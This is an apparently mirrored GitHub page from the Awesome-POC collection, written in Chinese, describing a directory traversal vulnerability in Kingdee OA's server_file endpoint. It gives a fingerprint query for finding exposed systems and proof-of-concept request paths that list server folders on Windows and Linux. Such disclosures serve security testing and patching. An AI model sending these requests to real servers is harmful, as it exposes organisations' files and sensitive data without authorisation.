admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 04:18:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/金蝶OA server_file 目录遍历漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

39 lines
611 B
Markdown
Raw Blame History

# 金蝶OA server_file 目录遍历漏洞
## 漏洞描述
金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
## 漏洞影响
```
金蝶OA
```
## 网络测绘
```
app="Kingdee-EAS"
```
## 漏洞复现
登录界面为
![](images/202202090144781.png)
漏洞POC
```plain
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
# Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
# Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
```
![](images/202202090144057.png)
Reference in New Issue View Git Blame Copy Permalink